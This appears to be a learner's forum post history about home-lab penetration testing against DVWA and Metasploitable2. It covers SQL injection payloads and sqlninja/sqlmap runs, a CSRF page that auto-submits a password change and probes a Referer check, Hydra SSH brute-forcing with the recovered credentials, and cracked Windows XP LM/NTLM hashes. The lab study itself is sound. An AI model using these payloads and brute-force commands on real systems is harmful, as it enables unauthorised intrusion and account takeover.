pierre

you were meaning : The escape string function is protecting the statment from exploitation, if the "escape string function" failed then the statement would no longer be protected. Imagine this over the whole of the internet. Which I answer: Yes but "if the escapte string statement failed" shouldn't be considered with such a function no ?

Ok I'll will maybe look for an MSSQL server to exploit :)

Here is my sqlninja conf file for GET method : root@osboxes:~# more sql_get.conf —httprequest_start— GET http://192.168.1.1/DVWA/vulnerabilities/sqli/? id=1&Submit=Submit#';__SQL2INJECT__HTTP/1.0 Host: 192.168.1.1 User-Agent: Mozilla/5.0 (X11; U; en-US; rv:1.7.13) Gecko/20060418Firefox/1.0.8 Accept: text/xml, application/xml, text/html; q=0.9, text/plain; q=0.8, image/png,*/* Accept-Language: en-us, en; q=0.7, it;q=0.3 Accept-Charset: ISO-8859-15, utf-8; q=0.7,*;q=0.7 Content-Type: application/x-www-form-urlencoded Cookie: security=low; PHPSESSID=k4ooe285n9nco1a3kj01p0hv93 Connection: close —httprequest_end— For this topology: But yes I am on MySQL, maybe it is the problem..

Yes but "if it failed" shouldn't be considered with such a function no ? However, I am aware there is other hardening step which can be implemented.

Hmm I don't understand you explanation..

Hello, I would to initiate myself to sqlninja : http://sqlninja.sourceforge.net/ I already following this tutorial: http://techotweak.blogspot.fr/2015/05/what-is-sql-injection-and-how-to-use.html But my injection is located at this url : http://192.168.1.1/DVWA/vulnerabilities/sqli/? So I can't use the same file parameters ... and it fails :( root@osboxes:~# sqlninja -mt -f sql_get.conf Sqlninja rel. 0.2.6-r1 Copyright (C) 2006-2011 icesurfer <r00t@northernfortress.net> [+] Parsing sql_get.conf... [-] HTTP request not defined in sql_get.conf Are you sure you are not using a configuration file of a previous version? Starting from version 0.2.6, the syntax has changed. See documentation Has someone ever succed in using this tool ? :)

Yes so nearly impossible ;) Thanks again for your clear explanations digininja :)

Yess exactly !! I try to escapte something that I didn't have to, I didn't have to encode my SQLi moreover. Low level: $query = "SELECT first_name, last_name FROM users WHERE user_id = '$id';"; Medium level: $query = "SELECT first_name, last_name FROM users WHERE user_id = $id;"; So in the medium level, our value isn't surround by quotes, so we don't have put ones :) But if the medium level were: $id = mysql_real_escape_string( $id ); $query = "SELECT first_name, last_name FROM users WHERE user_id = '$id';"; It would have been impossible to make SQLi ?

Yes but a client who has been redirected by a hacker webserver isn't supposed to use Burp. Ok I'll change my hacker webserver DNS. :) EDIT: Header Referer at 192.168.1.1 or http://192.168.1.1 make it works :)

Yes but if it is on level "Medium" on DVWA, it indicates that it might be bypassed ? EDIT: I've succeed bypassing this evasion function but I don't know why... Here is the original SQLi I want to pass: 1' OR '1'='1 I encode the space and equal in hexadecimal but not aposthophe, and it works (http://www.asciitable.com/): Encoded SQLi: 1%20OR%201%3D1 My question is the following: why is the SQLi works even if I don't have apostrohpe in ? Is it because equal and space aren't affected by my_real_escape_string() ? Cf: http://php.net/manual/en/function.mysql-real-escape-string.php mysql_real_escape_string() calls MySQL's library function mysql_real_escape_string, which prepends backslashes to the following characters: \x00, \n, \r, \, ', " and \x1a.

Hello, I where wondering if someone has ever bypass this function mysql_real_escape_string "mysql_real_escape_string() calls MySQL's library function mysql_real_escape_string, which prepends backslashes to the following characters: \x00, \n, \r, \, ', " and \x1a. " For example I want to inout the classic : 1' or '1'='1 in a variable encapsulated by mysql_real_escape_string function. Is it possible ? EDIT: even SQLMAP don't make it !! root@osboxes:/var/www/html# sqlmap -u "http://192.168.1.1/DVWA/vulnerabilities/sqli/#" --cookie="security=medium; PHPSESSID=u669kpihv3tsblhrgqo21lcu71" [...] [11:06:43] [CRITICAL] all tested parameters appear to be not injectable. Try to increase '--level'/'--risk' values to perform more tests. Also, you can try to rerun by providing either a valid value for option '--string' (or '--regexp') If you suspect that there is some kind of protection mechanism involved (e.g. WAF) maybe you could retry with an option '--tamper' (e.g. '--tamper=space2comment') [11:06:43] [WARNING] HTTP error codes detected during run: 404 (Not Found) - 222 times [*] shutting down at 11:06:43

Simply by navigating on the website. But another interesting thing, if from the W7 host : I run this html page with javascript included: <html> <head> <title>Yo</title> </head> <body bgcolor=white> <script> window.onload = function(){ window.open("http://192.168.1.1/DVWA/vulnerabilities/csrf/test.php"); window.open("http://192.168.1.1/DVWA/vulnerabilities/csrf/?password_new=test&password_conf=test&Change=Change"); } </script> </body> </html> Test.php is a page to test compare HTTP_REFERER & SERVER_NAME global variable, it prints this: Hello you come from ! Hello you come from 192.168.1.1 ! Different IPs -> no HTTP_REFERER IP detect, blanck That request didn't look correct. -> it means I can't change login/password HTTP_REFERER restriction even if HTTP_REFERER is blanck.. Yes the point here is to bypass HTTP_REFERER restriction, on one client I can do BURP proxy :) But on a client who has been redirected to the website by another webserver, I don't how to bypass HTTP_REFERER header..

1) I go to the page directly -> HTTP_REFERER=BLANK 2) I go from http://192.168.1.1/DVWA/index.php to http://192.168.1.1/DVWA/vulnerabilities/csrf/test.php -> HTTP_REFERER=BLANK 3) I go from http://192.168.0.1/index.html to http://http://192.168.1.1/DVWA/vulnerabilities/csrf/test.php -> HTTP_REFERER=192.168.0.1 So do you why in the 2nd situation, HTTP_REFERER header is still blank ?

Yes I test with this code : <html> <head> <title>PHP Test</title> </head> <body> <?php echo ('Hello you come from '.$_SERVER['HTTP_REFERER'].' ! '); echo ('Hello you come from '.$_SERVER['SERVER_NAME'].' ! '); if( eregi( $_SERVER[ 'SERVER_NAME' ], $_SERVER[ 'HTTP_REFERER' ] ) ) { echo("Same IPs"); } else { echo("Different IPs"); } ?> </body> </html> I just fucking don't know how to add a new line in PHP but it works never mind :) Yes but my HTTP_REFERER is either blanck or the IP from my hacker webserver (Kali) when the W7 hosts click on my Kali webserver to be redirect the Ubuntu webserver (CSRF) : Cc: I'm well block with the protection: if( eregi( $_SERVER[ 'SERVER_NAME' ], $_SERVER[ 'HTTP_REFERER' ] ) I plan on how to inject HTTP_referer valued in an HTTP request to bypass the boolean protection above !

Yes I've googled, is it a comparaison function ? Yes it is the medium protection. Ah because on my test either HTTP_REFERER is the pirates web server IP or the field is blank... So HTTP_REFERER could be equal to SERVER_NAME ?

Hello, I'm understanding how CSRF works. On DVWA, at medium level, here is some of the correction provides: // Checks to see where the request came from if( eregi( $_SERVER[ 'SERVER_NAME' ], $_SERVER[ 'HTTP_REFERER' ] ) Do you what eregi() function is used ofr ? I think SERVERNAME is my server_@IP ? But what is http_referer ?

Non even for -t 16 I have : [DATA] max 16 tasks per 1 server, overall 64 tasks, 280 login tries (l:14/p:20), ~0 tries per task But I got these shitty lines: The session file ./hydra.restore was written. Type "hydra -R" to resume session. The session file ./hydra.restore was written. Type "hydra -R" to resume session. The session file ./hydra.restore was written. Type "hydra -R" to resume session. So I think 6-8 are the right number of thread to execute Hydra.

I listen to the prompt and change my command: root@osboxes:~# hydra -L user.old -P pass.old 192.168.0.2 ssh -t 4 Hydra v8.1 (c) 2014 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes. Hydra (http://www.thc.org/thc-hydra) starting at 2016-06-14 04:52:22 [DATA] max 4 tasks per 1 server, overall 64 tasks, 280 login tries (l:14/p:20), ~1 try per task [DATA] attacking service ssh on port 22 [22][ssh] host: 192.168.0.2 login: klog password: 123456789 [22][ssh] host: 192.168.0.2 login: msfadmin password: msfadmin [STATUS] 141.00 tries/min, 141 tries in 00:01h, 139 todo in 00:01h, 4 active [22][ssh] host: 192.168.0.2 login: service password: service [22][ssh] host: 192.168.0.2 login: sys password: batman [STATUS] 137.50 tries/min, 275 tries in 00:02h, 5 todo in 00:01h, 4 active 1 of 1 target successfully completed, 4 valid passwords found Hydra (http://www.thc.org/thc-hydra) finished at 2016-06-14 04:54:26 This time all credentials were well-found !! Adding the options -t 4 to my command :) -t TASKS run TASKS number of connects in parallel (default: 16) It has something to do with the parallel tasks in the processor ? I've made some tests : A –t 6 makes the same good result within 1m24s. A –t 8 makes the same good result within 57s. A –t 10 makes the same good result within 50s. A –t 11 makes a wrong result within 54s omitting 2/4 credentials. And at -t 11 I got the warning: [WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4 [DATA] max 11 tasks per 1 server, overall 64 tasks, 280 login tries (l:14/p:20), ~0 tries per task There is something scientific behind all this i'm sure !

Hello, I work with Hydra on metasploitable2. I have metasploitable credentials account in two files, "user" and "pass". I just want to know account have SSH right configured, so I bruteforce. Three account have SSH access on the target: root@osboxes:~# ssh sys@192.168.0.2 sys@192.168.0.2's password: sys@metasploitable:~$ exit logout root@osboxes:~# ssh msfadmin@192.168.0.2 msfadmin@192.168.0.2's password: msfadmin@metasploitable:~$ exit logout root@osboxes:~# ssh service@192.168.0.2 service@192.168.0.2's password: service@metasploitable:~$ exit logout Now I want to bruteforce with Hydra: root@osboxes:~# more user sys klog msfadmin service root@osboxes:~# more pass service msfadmin 123456789 batman And here is my Hydra command and the result: root@osboxes:~# hydra -L user -P pass 192.168.0.2 ssh Hydra v8.1 (c) 2014 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes. Hydra (http://www.thc.org/thc-hydra) starting at 2016-06-13 11:18:39 [WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4 [DATA] max 16 tasks per 1 server, overall 64 tasks, 16 login tries (l:4/p:4), ~0 tries per task [DATA] attacking service ssh on port 22 [22][ssh] host: 192.168.0.2 login: service password: service [22][ssh] host: 192.168.0.2 login: msfadmin password: msfadmin [22][ssh] host: 192.168.0.2 login: klog password: 123456789 1 of 1 target successfully completed, 3 valid passwords found Hydra (http://www.thc.org/thc-hydra) finished at 2016-06-13 11:18:42 Hydra is well recovering the password but not the right account.. It omits the account "sys:batman", do you know why ?

No I was misunderstanding I work on LM hash and a LM is composed in 2 hashes, so i've got to put both to decrypt them: :)

I've been succeeding in cracking this hash:e52cac67419a9a224a3b108f3fa6cb6d -> PASSWORD, so it may be the users's password However, I don't succeed in this hash 8846f7eaee8fb117ad06bdd830b7586c.... so I don't what it should used for.. You think the 2nd is the salt ? I don't supposed so because I am on Windows XP system

Hello, I've dump hash on my XP VM and here is the output: user:1004:e52cac67419a9a224a3b108f3fa6cb6d:8846f7eaee8fb117ad06bdd830b7586c::: In Linux it is like on /etc/passwd with 7 fields: Username:Password:User ID :Group ID:User ID Info:Home directory:Command/shell Here we also have 7 fileds, but it like: Username:User ID :HASH:HASH::: Do you know what are the two hashes ?

Thank you I fully understand how it works now, the big difference between exploit & payload :)

Ah ok thanks I didn't understand it in that way... Thanks you very much

So no exploit are needed, only a payload ? The exploit is the human himself by launching the payload ?